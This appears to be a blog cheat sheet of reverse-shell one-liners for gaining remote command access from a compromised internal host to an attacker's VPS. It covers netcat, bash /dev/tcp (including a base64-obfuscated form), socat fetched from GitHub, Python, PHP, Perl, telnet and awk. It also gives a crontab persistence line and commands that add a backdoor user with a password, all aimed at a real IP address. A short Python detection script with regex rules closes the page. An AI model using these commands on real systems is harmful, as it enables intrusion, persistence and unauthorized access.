• Reverse shells


    nc reverse shell

    When nc has no -e option

    
    The VPS listens first
    vps:nc -lvp 2333
    
    Internal host:
    rm /tmp/f -rf;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 123.57.62.22 2333 >/tmp/f
    or
    mknod backpipe p; nc 123.57.62.22 2333 0<backpipe | /bin/bash 1>backpipe 2>backpipe
    

    When nc has the -e option

    vps:
    ncat -lv 2333
    
    Internal host:
    nc -e /bin/bash 123.57.62.22 2333
    

    bash

    vps:
    ncat -lv 2333
    
    Internal host:
    bash -i >& /dev/tcp/123.57.62.22/2333 0>&1
    or base64-encoded:
    bash -c {echo,IGJhc2ggLWkgPiYgL2Rldi90Y3AvMTIzLjU3LjYyLjIyLzIzMzMgMCA+JjE=}|{base64,-d}|{bash,-i}
    

    socat

    vps:
    socat TCP-LISTEN:12345 -
    
    Internal host:
    socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:123.57.62.22:12345
    
    When the internal host has no socat:

    wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat
    chmod 755 /tmp/socat
    /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:123.57.62.22:12345
    

    Scripting languages:

    vps:
    nc -lvp 8080
    
    Internal host:
    python:
    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("123.57.62.22",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
    or
    python -c "import pty;pty.spawn('/bin/bash')"
    
    php:
    php -r '$sock=fsockopen("123.57.62.22",8080);exec("/bin/sh -i <&3 >&3 2>&3");'
    
    perl:
    perl -e 'use Socket;$i="123.57.62.22";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
    

    telnet:

    vps:
    nc -vlp 1080   (window that displays command output)
    nc -lvp 8080   (window that sends commands)
    
    Internal host:
    telnet 123.57.62.22 8080 | /bin/bash | telnet 123.57.62.22 1080
    or
    mknod test p && telnet 123.57.62.22  12345 0<test | /bin/bash 1>test
    

    awk:

    vps:
    nc -lvp 12345
    
    Internal host:
    awk 'BEGIN{s="/inet/tcp/0/123.57.62.22/12345";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'
    

    crontab:

    vps:
    nc -lvp 12345
    
    Internal host:
    (crontab -l;printf "* * * * *  /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("123.57.62.22",12345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
    ")|crontab -
    
    

    When the shell is not interactive-friendly

    Add a user in one line

    useradd newuser;echo "newuser:password"|chpasswd
    e.g.: useradd guest;echo 'guest:123456'|chpasswd
    useradd -p encrypted_password newuser
    e.g.: useradd -p `openssl passwd 123456` guest
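A defender-side check that fits this list: the one-liners above share a small set of telltale substrings in their command lines. The Python below is an added example (not part of the original post): it scans a constructed process-execution log in the form `<user> <command line>` and reports which reverse-shell or user-creation pattern each line trips. The log lines and the 203.0.113.0/24 addresses are constructed for the example.

```python
import re

# Constructed sample of a process-execution log, one "<user> <command line>" per
# line. The first nine lines mirror the one-liners in this post (documentation-
# range addresses); the last four are benign admin activity that must not fire.
SAMPLE_EXEC_LOG = """\
www-data bash -i >& /dev/tcp/203.0.113.5/2333 0>&1
www-data rm /tmp/f -rf;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 203.0.113.5 2333 >/tmp/f
www-data nc -e /bin/bash 203.0.113.5 2333
www-data /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:203.0.113.5:12345
www-data python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("203.0.113.5",8080));os.dup2(s.fileno(),0)'
www-data telnet 203.0.113.5 8080 | /bin/bash | telnet 203.0.113.5 1080
www-data awk 'BEGIN{s="/inet/tcp/0/203.0.113.5/12345";for(;s|&getline c;close(c))while(c|getline)print|&s}'
www-data (crontab -l;printf "* * * * * /usr/bin/python -c 'import socket'")|crontab -
www-data useradd guest;echo 'guest:123456'|chpasswd
admin nc -lvp 8080
admin python -c 'import sys;print(sys.version)'
admin socat TCP-LISTEN:12345 -
root crontab -l
"""

# One rule per technique on this page. Command-line matching is a first pass only:
# the base64 variant ({echo,...}|{base64,-d}|{bash,-i}) hides every keyword, so pair
# this with a behavioural rule such as "shell process whose stdin is a TCP socket".
RULES = [
    ("bash_dev_tcp", re.compile(r"/dev/(tcp|udp)/\d{1,3}(\.\d{1,3}){3}/\d+")),
    ("nc_exec", re.compile(r"\b(nc|ncat|netcat)\b[^|;]*\s-[a-zA-Z]*e\s*(/bin/|bash|sh\b)")),
    ("fifo_to_nc", re.compile(r"\b(mkfifo|mknod)\b.*\|\s*(nc|ncat|netcat|telnet)\b")),
    ("socat_exec_tcp", re.compile(r"\bsocat\b.*\bexec:.*\btcp:")),
    ("interpreter_socket_dup", re.compile(r"\b(python[23]?|perl|php|ruby)\b.*(socket|fsockopen).*(dup2|exec|open\(STD)")),
    ("telnet_pipe_shell", re.compile(r"\btelnet\b[^|]*\|\s*/bin/(ba)?sh")),
    ("awk_inet_tcp", re.compile(r"\bawk\b.*/inet/tcp/")),
    ("cron_inject_net", re.compile(r"(socket|/dev/tcp|\bnc\b|\bncat\b).*\|\s*crontab\s+-\s*$")),
    ("user_add_pw", re.compile(r"\buseradd\b.*\b(chpasswd|openssl passwd)\b")),
]


def scan_exec_log(log_text):
    """Return (rule_name, user, command) for every rule each log line trips."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        user, _, cmd = line.strip().partition(" ")
        cmd = cmd.strip()
        for name, pattern in RULES:
            if pattern.search(cmd):
                hits.append((name, user, cmd))
    return hits
```

Run `scan_exec_log(SAMPLE_EXEC_LOG)` to see each of the nine flagged lines paired with exactly one rule name; the four admin lines produce nothing.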
    
    
  • Original article: https://www.cnblogs.com/zaqzzz/p/11960699.html